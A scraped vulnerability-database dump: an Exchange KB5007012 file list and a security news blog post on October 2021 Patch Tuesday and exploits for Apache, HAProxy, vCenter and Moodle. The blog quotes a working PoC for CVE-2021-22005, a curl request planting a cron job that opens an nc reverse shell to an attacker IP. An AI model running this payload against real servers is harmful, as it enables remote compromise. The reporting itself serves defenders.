x86| \nMicrosoft.exchange.transport.storage.dll| 15.1.2308.15| 675,216| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.storage.management.dll| 15.1.2308.15| 21,888| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.transport.sync.agents.dll| 15.1.2308.15| 17,808| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.transport.sync.common.dll| 15.1.2308.15| 487,296| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.1.2308.15| 12,680| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.transport.sync.manager.dll| 15.1.2308.15| 306,056| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.1.2308.15| 15,760| 25-Sep-21| 7:05| x64| \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.1.2308.15| 46,456| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.sync.worker.dll| 15.1.2308.15| 1,044,368| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.1.2308.15| 15,240| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.1.2308.15| 18,824| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.1.2308.15| 18,824| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.um.callrouter.exe| 15.1.2308.15| 22,400| 25-Sep-21| 7:04| x86| \nMicrosoft.exchange.um.clientstrings.dll| 15.1.2308.15| 60,280| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.um.grammars.dll| 15.1.2308.15| 211,832| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.um.lad.dll| 15.1.2308.15| 120,712| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.um.prompts.dll| 15.1.2308.15| 214,928| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.1.2308.15| 118,672| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.um.ucmaplatform.dll| 15.1.2308.15| 239,504| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.um.umcommon.dll| 15.1.2308.15| 925,072| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.um.umcore.dll| 15.1.2308.15| 1,471,880| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.1.2308.15| 32,648| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.unifiedcontent.dll| 15.1.2308.15| 41,872| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.1.2308.15| 24,976| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.unifiedmessaging.eventlog.dll| 15.1.2308.15| 130,424| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.1.2308.15| 15,224| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.1.2308.15| 83,320| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.1.2308.15| 50,064| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.1.2308.15| 658,832| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.variantconfiguration.core.dll| 15.1.2308.15| 186,256| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.variantconfiguration.dll| 15.1.2308.15| 67,472| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.1.2308.15| 12,664| 25-Sep-21| 7:00| x64| \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.1.2308.15| 56,712| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.1.2308.15| 28,024| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.1.2308.15| 120,720| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.1.2308.15| 31,624| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.1.2308.15| 57,208| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.webservices.auth.dll| 15.1.2308.15| 35,720| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.webservices.dll| 15.1.2308.15| 1,054,072| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.webservices.xrm.dll| 15.1.2308.15| 67,976| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.wlmservicelet.dll| 15.1.2308.15| 23,440| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.wopiclient.dll| 15.1.2308.15| 77,192| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.workingset.signalapi.dll| 15.1.2308.15| 17,272| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.1.2308.15| 29,064| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.workloadmanagement.dll| 15.1.2308.15| 505,232| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.1.2308.15| 14,728| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.1.2308.15| 36,752| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.1.2308.15| 66,448| 25-Sep-21| 7:01| x86| \nMicrosoft.fast.contextlogger.json.dll| 15.1.2308.15| 19,344| 25-Sep-21| 7:01| x86| \nMicrosoft.filtering.dll| 15.1.2308.15| 113,016| 25-Sep-21| 7:03| x86| \nMicrosoft.filtering.exchange.dll| 15.1.2308.15| 57,216| 25-Sep-21| 7:03| x86| \nMicrosoft.filtering.interop.dll| 15.1.2308.15| 15,232| 25-Sep-21| 7:03| x86| \nMicrosoft.forefront.activedirectoryconnector.dll| 15.1.2308.15| 46,984| 25-Sep-21| 7:00| x86| \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.1.2308.15| 15,736| 25-Sep-21| 7:03| x64| \nMicrosoft.forefront.filtering.common.dll| 15.1.2308.15| 23,944| 25-Sep-21| 7:00| x86| \nMicrosoft.forefront.filtering.diagnostics.dll| 15.1.2308.15| 22,408| 25-Sep-21| 7:01| x86| \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.1.2308.15| 34,704| 25-Sep-21| 7:03| x86| \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,898| 25-Sep-21| 7:01| Not applicable| \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,290| 25-Sep-21| 7:01| Not applicable| \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.1.2308.15| 1,518,472| 25-Sep-21| 7:01| x86| \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.1.2308.15| 13,200| 25-Sep-21| 7:01| x64| \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.1.2308.15| 33,144| 25-Sep-21| 7:03| x86| \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.1.2308.15| 18,312| 25-Sep-21| 7:00| x86| \nMicrosoft.forefront.reporting.common.dll| 15.1.2308.15| 46,472| 25-Sep-21| 7:02| x86| \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.1.2308.15| 50,568| 25-Sep-21| 7:01| x86| \nMicrosoft.isam.esent.collections.dll| 15.1.2308.15| 72,592| 25-Sep-21| 7:02| x86| \nMicrosoft.isam.esent.interop.dll| 15.1.2308.15| 533,888| 25-Sep-21| 7:02| x86| \nMicrosoft.managementgui.dll| 15.1.2308.15| 133,496| 25-Sep-21| 7:01| x86| \nMicrosoft.mce.interop.dll| 15.1.2308.15| 24,456| 25-Sep-21| 7:02| x86| \nMicrosoft.office.audit.dll| 15.1.2308.15| 123,792| 25-Sep-21| 7:01| x86| \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.1.2308.15| 593,296| 25-Sep-21| 7:00| x86| \nMicrosoft.office.common.ipcommonlogger.dll| 15.1.2308.15| 42,376| 25-Sep-21| 7:01| x86| \nMicrosoft.office.compliance.console.core.dll| 15.1.2308.15| 217,976| 25-Sep-21| 7:02| x86| \nMicrosoft.office.compliance.console.dll| 15.1.2308.15| 854,920| 25-Sep-21| 7:01| x86| \nMicrosoft.office.compliance.console.extensions.dll| 15.1.2308.15| 485,752| 25-Sep-21| 7:01| x86| \nMicrosoft.office.compliance.core.dll| 15.1.2308.15| 413,064| 25-Sep-21| 7:03| x86| \nMicrosoft.office.compliance.ingestion.dll| 15.1.2308.15| 36,240| 25-Sep-21| 7:03| x86| \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.1.2308.15| 85,368| 25-Sep-21| 7:01| x86| \nMicrosoft.office.compliancepolicy.platform.dll| 15.1.2308.15| 1,783,688| 25-Sep-21| 7:01| x86| \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.1.2308.15| 49,544| 25-Sep-21| 7:02| x86| \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.1.2308.15| 27,536| 25-Sep-21| 7:01| x86| \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.1.2308.15| 174,984| 25-Sep-21| 7:01| x86| \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.1.2308.15| 165,776| 25-Sep-21| 7:00| x86| \nMicrosoft.office365.datainsights.uploader.dll| 15.1.2308.15| 40,336| 25-Sep-21| 7:00| x86| \nMicrosoft.online.box.shell.dll| 15.1.2308.15| 46,480| 25-Sep-21| 7:00| x86| \nMicrosoft.powershell.hostingtools.dll| 15.1.2308.15| 67,960| 25-Sep-21| 7:00| x86| \nMicrosoft.powershell.hostingtools_2.dll| 15.1.2308.15| 67,960| 25-Sep-21| 7:00| x86| \nMicrosoft.tailoredexperiences.core.dll| 15.1.2308.15| 120,200| 25-Sep-21| 7:03| x86| \nMigrateumcustomprompts.ps1| Not applicable| 19,106| 25-Sep-21| 7:03| Not applicable| \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,048| 25-Sep-21| 7:03| Not applicable| \nMovemailbox.ps1| Not applicable| 61,108| 25-Sep-21| 7:03| Not applicable| \nMovetransportdatabase.ps1| Not applicable| 30,622| 25-Sep-21| 7:03| Not applicable| \nMove_publicfolderbranch.ps1| Not applicable| 17,512| 25-Sep-21| 7:03| Not applicable| \nMpgearparser.dll| 15.1.2308.15| 99,712| 25-Sep-21| 7:00| x64| \nMsclassificationadapter.dll| 15.1.2308.15| 248,720| 25-Sep-21| 7:04| x64| \nMsexchangecompliance.exe| 15.1.2308.15| 78,736| 25-Sep-21| 7:01| x86| \nMsexchangedagmgmt.exe| 15.1.2308.15| 25,464| 25-Sep-21| 7:01| x86| \nMsexchangedelivery.exe| 15.1.2308.15| 38,776| 25-Sep-21| 7:01| x86| \nMsexchangefrontendtransport.exe| 15.1.2308.15| 31,624| 25-Sep-21| 7:03| x86| \nMsexchangehmhost.exe| 15.1.2308.15| 27,000| 25-Sep-21| 7:00| x86| \nMsexchangehmrecovery.exe| 15.1.2308.15| 29,568| 25-Sep-21| 7:01| x86| \nMsexchangemailboxassistants.exe| 15.1.2308.15| 72,576| 25-Sep-21| 7:00| x86| \nMsexchangemailboxreplication.exe| 15.1.2308.15| 20,872| 25-Sep-21| 7:01| x86| \nMsexchangemigrationworkflow.exe| 15.1.2308.15| 69,008| 25-Sep-21| 7:03| x86| \nMsexchangerepl.exe| 15.1.2308.15| 71,032| 25-Sep-21| 7:03| x86| \nMsexchangesubmission.exe| 15.1.2308.15| 123,256| 25-Sep-21| 7:01| x86| \nMsexchangethrottling.exe| 15.1.2308.15| 39,808| 25-Sep-21| 7:03| x86| \nMsexchangetransport.exe| 15.1.2308.15| 74,112| 25-Sep-21| 7:03| x86| \nMsexchangetransportlogsearch.exe| 15.1.2308.15| 139,128| 25-Sep-21| 7:02| x86| \nMsexchangewatchdog.exe| 15.1.2308.15| 55,672| 25-Sep-21| 7:01| x64| \nMspatchlinterop.dll| 15.1.2308.15| 53,648| 25-Sep-21| 7:02| x64| \nNativehttpproxy.dll| 15.1.2308.15| 91,528| 25-Sep-21| 7:03| x64| \nNavigatorparser.dll| 15.1.2308.15| 636,800| 25-Sep-21| 7:00| x64| \nNego2nativeinterface.dll| 15.1.2308.15| 19,320| 25-Sep-21| 7:02| x64| \nNegotiateclientcertificatemodule.dll| 15.1.2308.15| 30,088| 25-Sep-21| 7:04| x64| \nNewtestcasconnectivityuser.ps1| Not applicable| 22,248| 25-Sep-21| 7:03| Not applicable| \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,559| 25-Sep-21| 7:03| Not applicable| \nNtspxgen.dll| 15.1.2308.15| 80,776| 25-Sep-21| 7:02| x64| \nOleconverter.exe| 15.1.2308.15| 173,960| 25-Sep-21| 7:02| x64| \nOutsideinmodule.dll| 15.1.2308.15| 87,944| 25-Sep-21| 7:01| x64| \nOwaauth.dll| 15.1.2308.15| 92,040| 25-Sep-21| 7:02| x64| \nOwasmime.msi| Not applicable| 716,800| 25-Sep-21| 7:04| Not applicable| \nPerf_common_extrace.dll| 15.1.2308.15| 245,136| 25-Sep-21| 7:01| x64| \nPerf_exchmem.dll| 15.1.2308.15| 85,888| 25-Sep-21| 7:02| x64| \nPipeline2.dll| 15.1.2308.15| 1,454,480| 25-Sep-21| 7:01| x64| \nPowershell.rbachostingtools.dll_1bf4f3e363ef418781685d1a60da11c1| 15.1.2308.15| 41,336| 25-Sep-21| 7:00| Not applicable| \nPreparemoverequesthosting.ps1| Not applicable| 70,975| 25-Sep-21| 7:03| Not applicable| \nPrepare_moverequest.ps1| Not applicable| 73,229| 25-Sep-21| 7:03| Not applicable| \nProductinfo.managed.dll| 15.1.2308.15| 27,000| 25-Sep-21| 7:00| x86| \nProxybinclientsstringsdll| 15.1.2308.15| 924,560| 25-Sep-21| 7:02| x86| \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,258| 25-Sep-21| 7:03| Not applicable| \nQuietexe.exe| 15.1.2308.15| 14,720| 25-Sep-21| 7:03| x86| \nRedistributeactivedatabases.ps1| Not applicable| 250,604| 25-Sep-21| 7:05| Not applicable| \nReinstalldefaulttransportagents.ps1| Not applicable| 21,667| 25-Sep-21| 7:03| Not applicable| \nRemoteexchange.ps1| Not applicable| 23,557| 25-Sep-21| 7:03| Not applicable| \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,668| 25-Sep-21| 7:03| Not applicable| \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 14,982| 25-Sep-21| 7:03| Not applicable| \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 14,996| 25-Sep-21| 7:03| Not applicable| \nReplaycrimsonmsg.dll| 15.1.2308.15| 1,099,152| 25-Sep-21| 7:02| x64| \nResetattachmentfilterentry.ps1| Not applicable| 15,496| 25-Sep-21| 7:04| Not applicable| \nResetcasservice.ps1| Not applicable| 21,703| 25-Sep-21| 7:03| Not applicable| \nReset_antispamupdates.ps1| Not applicable| 14,101| 25-Sep-21| 7:03| Not applicable| \nRestoreserveronprereqfailure.ps1| Not applicable| 15,125| 25-Sep-21| 7:03| Not applicable| \nResumemailboxdatabasecopy.ps1| Not applicable| 17,230| 25-Sep-21| 7:03| Not applicable| \nRightsmanagementwrapper.dll| 15.1.2308.15| 86,408| 25-Sep-21| 7:02| x64| \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,786| 25-Sep-21| 7:03| Not applicable| \nRpcperf.dll| 15.1.2308.15| 23,440| 25-Sep-21| 7:03| x64| \nRpcproxyshim.dll| 15.1.2308.15| 39,296| 25-Sep-21| 7:05| x64| \nRulesauditmsg.dll| 15.1.2308.15| 12,688| 25-Sep-21| 7:03| x64| \nRwsperfcounters.xml| Not applicable| 23,044| 25-Sep-21| 7:02| Not applicable| \nSafehtmlnativewrapper.dll| 15.1.2308.15| 34,696| 25-Sep-21| 7:02| x64| \nScanenginetest.exe| 15.1.2308.15| 956,304| 25-Sep-21| 7:03| x64| \nScanningprocess.exe| 15.1.2308.15| 739,216| 25-Sep-21| 7:01| x64| \nSearchdiagnosticinfo.ps1| Not applicable| 16,796| 25-Sep-21| 7:03| Not applicable| \nServicecontrol.ps1| Not applicable| 52,313| 25-Sep-21| 7:03| Not applicable| \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,738| 25-Sep-21| 7:03| Not applicable| \nSettingsadapter.dll| 15.1.2308.15| 115,592| 25-Sep-21| 7:04| x64| \nSetup.exe| 15.1.2308.15| 20,872| 25-Sep-21| 7:03| x86| \nSetupui.exe| 15.1.2308.15| 49,016| 25-Sep-21| 7:03| x86| \nSplit_publicfoldermailbox.ps1| Not applicable| 52,173| 25-Sep-21| 7:03| Not applicable| \nStartdagservermaintenance.ps1| Not applicable| 27,847| 25-Sep-21| 7:03| Not applicable| \nStatisticsutil.dll| 15.1.2308.15| 142,216| 25-Sep-21| 7:01| x64| \nStopdagservermaintenance.ps1| Not applicable| 21,145| 25-Sep-21| 7:03| Not applicable| \nStoretsconstants.ps1| Not applicable| 15,842| 25-Sep-21| 7:03| Not applicable| \nStoretslibrary.ps1| Not applicable| 28,003| 25-Sep-21| 7:03| Not applicable| \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.1.2308.15| 28,536| 25-Sep-21| 7:04| x64| \nSync_mailpublicfolders.ps1| Not applicable| 43,911| 25-Sep-21| 7:03| Not applicable| \nSync_modernmailpublicfolders.ps1| Not applicable| 43,957| 25-Sep-21| 7:03| Not applicable| \nTextconversionmodule.dll| 15.1.2308.15| 86,408| 25-Sep-21| 7:01| x64| \nTroubleshoot_ci.ps1| Not applicable| 22,739| 25-Sep-21| 7:03| Not applicable| \nTroubleshoot_databaselatency.ps1| Not applicable| 33,417| 25-Sep-21| 7:03| Not applicable| \nTroubleshoot_databasespace.ps1| Not applicable| 30,009| 25-Sep-21| 7:03| Not applicable| \nUmservice.exe| 15.1.2308.15| 100,232| 25-Sep-21| 7:03| x86| \nUmworkerprocess.exe| 15.1.2308.15| 38,288| 25-Sep-21| 7:03| x86| \nUninstall_antispamagents.ps1| Not applicable| 15,473| 25-Sep-21| 7:03| Not applicable| \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,014| 25-Sep-21| 7:03| Not applicable| \nUpdatecas.ps1| Not applicable| 35,343| 25-Sep-21| 7:03| Not applicable| \nUpdateconfigfiles.ps1| Not applicable| 19,762| 25-Sep-21| 7:03| Not applicable| \nUpdateserver.exe| 15.1.2308.15| 3,014,544| 25-Sep-21| 7:01| x64| \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,156| 25-Sep-21| 7:03| Not applicable| \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 32,048| 25-Sep-21| 7:03| Not applicable| \nWsbexchange.exe| 15.1.2308.15| 125,328| 25-Sep-21| 7:03| x64| \nX400prox.dll| 15.1.2308.15| 103,288| 25-Sep-21| 7:04| x64| \n_search.lingoperators.a| 15.1.2308.15| 34,680| 25-Sep-21| 7:02| Not applicable| \n_search.lingoperators.b| 15.1.2308.15| 34,680| 25-Sep-21| 7:02| Not applicable| \n_search.mailboxoperators.a| 15.1.2308.15| 289,152| 25-Sep-21| 7:03| Not applicable| \n_search.mailboxoperators.b| 15.1.2308.15| 289,152| 25-Sep-21| 7:03| Not applicable| \n_search.operatorschema.a| 15.1.2308.15| 483,216| 25-Sep-21| 7:03| Not applicable| \n_search.operatorschema.b| 15.1.2308.15| 483,216| 25-Sep-21| 7:03| Not applicable| \n_search.tokenoperators.a| 15.1.2308.15| 106,888| 25-Sep-21| 7:03| Not applicable| \n_search.tokenoperators.b| 15.1.2308.15| 106,888| 25-Sep-21| 7:03| Not applicable| \n_search.transportoperators.a| 15.1.2308.15| 64,904| 25-Sep-21| 7:02| Not applicable| \n_search.transportoperators.b| 15.1.2308.15| 64,904| 25-Sep-21| 7:02| Not applicable| \n \n## Information about protection and security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-12T07:00:00", "type": "mskb", "title": "Description of the security update for Microsoft Exchange Server 2019 and 2016: October 12, 2021 (KB5007012)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26427", "CVE-2021-34453", "CVE-2021-41348", "CVE-2021-41350"], "modified": "2021-10-12T07:00:00", "id": "KB5007012", "href": "https://support.microsoft.com/en-us/help/5007012", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2021-11-26T18:43:30", "description": "Hello everyone! This episode will be about relatively recent critical vulnerabilities. Let's start with Microsoft Patch Tuesday for October 2021. Specifically, with the vulnerability that I expected there, but it didn't get there.\n\n## Autodiscover leak discovered by Guardicore Labs \n\n"Autodiscover, a protocol used by Microsoft Exchange for automatic configuration of clients such as Microsoft Outlook, has a design flaw that causes the protocol to \u201cleak\u201d web requests to Autodiscover domains outside of the user\u2019s domain but in the same TLD (i.e. Autodiscover.com)." [Guardicore Labs acquired multiple Autodiscover domains](<https://www.guardicore.com/labs/autodiscovering-the-great-leak/>) and have captured 372,072 Windows domain credentials in total. It seems Microsoft have chosen to ignore this issue. No CVE, no Outlook or ActiveSync patches. The only fix is to ban the "Autodiscover." domains on devices.\n\n## Microsoft Patch Tuesday for October 2021\n\n74 vulnerabilities: 1 Critical, 30 High, 43 Medium.\n\n### Elevation of Privilege - Windows Kernel (CVE-2021-40449)\n\nIt is a [use-after-free vulnerability](<https://encyclopedia.kaspersky.com/glossary/use-after-free/>) in the NtGdiResetDC function of the Win32k driver. A detailed technical description is available in Kasperky [Securelist post](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>), but, in short, the vulnerability can lead to leakage of kernel module addresses in the computer\u2019s memory. This vulnerability is being exploited in the wild by APT MysterySnail. All servers and desktops should be updated.\n\n### Remote Code Execution - Microsoft Exchange Server (CVE-2021-26427)\n\nIt is necessary to update the Exchanges, but it's not very critical. "Despite the high CVSS score, the advisory does specifically point out that the vulnerability would only be exploitable from an adjacent network". There are no signs of exploitation or exploits yet. Three other vulnerabilities related to Exchange Server were also patched: CVE-2021-41350, a Spoofing vulnerability; CVE-2021-41348, allowing elevation of privilege; and CVE-2021-34453, which is a Denial of Service vulnerability.\n\n### Remote Code Execution - Windows DNS Server (CVE-2021-40469)\n\nDNS servers need to be updated, but real exploitation is unlikely. It was categorized as \u201cExploitation Less Likely.\u201d It received a CVSSv3 score of 7.2 because an attacker needs a privileged user account in order to exploit this across the network.\n\n### Remote Code Execution - Microsoft Word (CVE-2021-40486)\n\nThis is a good reason to check the Windows desktop updates. "This patch corrects a bug that would allow code execution when a specially crafted Word document is viewed on an affected system. Although Microsoft lists user interaction required, the Preview Pane is also listed as an attack vector." Also take a look at desktop vulnerability Spoofing - Windows Print Spooler (CVE-2021-36970), \u201cExploitation More Likely\u201d.\n\nAnd here you can get the whole [Vulristics report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_october2021_report_avleonov_comments.html>) for Microsoft Patch Tuesday October 2021.\n\n## Apache RCE with exploit (CVE-2021-41773)\n\nApache situation is like The Benny Hill Show. First, they released a new version (49) with a critical Path Traversal / RCE vulnerability CVE-2021-41773. Other versions were safe. Fortunately, this was revealed relatively quickly, in 2 weeks. The main stable distributions simply did not have time to add these packages to their repositories. Only fans of installing Apache from source and users of Slackware, Fedora and FreeBSD have suffered. And what was left for the victims to do? Obviously, hurry to roll the new safe version (50). But it turned out that the vulnerability in 50 was not completely fixed. And now the exploit [Apache HTTP Server 2.4.50 - Path / Traversal & Remote Code Execution (RCE)](<https://vulners.com/exploitdb/EDB-ID:50406>) is [publicly available](<https://t.me/avleonovnews/7619>). Repeat the exercise comrades in rolling now version 51. Everything will definitely be fine there.  It's just a circus. \n\n## HAProxy RCE with exploit (CVE-2021-40346)\n\nA critical security vulnerability has [been disclosed in HAProxy](<https://thehackernews.com/2021/09/haproxy-found-vulnerable-to-critical.html>), a widely used open-source load balancer and proxy server, that could be abused by an adversary to possibly smuggle HTTP requests, resulting in unauthorized access to sensitive data and execution of arbitrary commands, effectively opening the door to an array of attacks. [A public POC](<https://github.com/donky16/CVE-2021-40346-POC>) has appeared for the vulnerability.\n\n## VMware vCenter arbitrary file upload with public exploit\n\n"[On September 21, 2021, VMware disclosed](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>) that its vCenter Server is affected by an arbitrary file upload vulnerability\u2014CVE-2021-22005\u2014in the Analytics service. A malicious cyber actor with network access to port 443 can exploit this vulnerability to execute code on vCenter Server. On September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability".\n\n> CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below. \n \ncurl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" <https://t.co/wi08brjl3r> [pic.twitter.com/bwjMA21ifA](<https://t.co/bwjMA21ifA>)\n> \n> -- wvu (@wvuuuuuuuuuuuuu) [September 27, 2021](<https://twitter.com/wvuuuuuuuuuuuuu/status/1442634215330390020?ref_src=twsrc%5Etfw>)\n\n## RCE exploits for Moodle\n\nSeveral RCE exploits for Moodle [were released on October 13](<https://t.me/avleonovnews/7605>). \n\n 1. [1337DAY-ID-36891](<https://vulners.com/zdt/1337DAY-ID-36891>) - Moodle Admin Shell Upload Exploit\n 2. [1337DAY-ID-36892](<https://vulners.com/zdt/1337DAY-ID-36892>) - Moodle SpellChecker Path Authenticated Remote Command Execution Exploit\n 3. [1337DAY-ID-36893](<https://vulners.com/zdt/1337DAY-ID-36893>) - Moodle Teacher Enrollment Privilege Escalation / Remote Code Execution Exploit\n 4. [1337DAY-ID-36894](<https://vulners.com/zdt/1337DAY-ID-36894>) - Moodle Authenticated Spelling Binary Remote Code Execution Exploit\n\n"Moodle is a free and open-source learning management system. it is used for blended learning, distance education, flipped classroom and other e-learning projects in schools, universities, workplaces and other sectors". Surely some organizations make it available on the network perimeter and do not update it regularly.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-21T00:23:01", "type": "avleonov", "title": "Security News: Microsoft Patch Tuesday October 2021, Autodiscover, MysterySnail, Exchange, DNS, Apache, HAProxy, VMware vCenter, Moodle", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005", "CVE-2021-26427", "CVE-2021-34453", "CVE-2021-36970", "CVE-2021-40346", "CVE-2021-40449", "CVE-2021-40469", "CVE-2021-40486", "CVE-2021-41348", "CVE-2021-41350", "CVE-2021-41773"], "modified": "2021-10-21T00:23:01", "id": "AVLEONOV:99215B2D7808C46D8762AD712CD3D267", "href": "https://avleonov.com/2021/10/21/security-news-microsoft-patch-tuesday-october-2021-autodiscover-mysterysnail-exchange-dns-apache-haproxy-vmware-vcenter-moodle/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-10-20T09:06:39", "description": "\n\nToday\u2019s Patch Tuesday sees Microsoft [issuing fixes](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Oct>) for over 70 CVEs, affecting the usual mix of their product lines. From 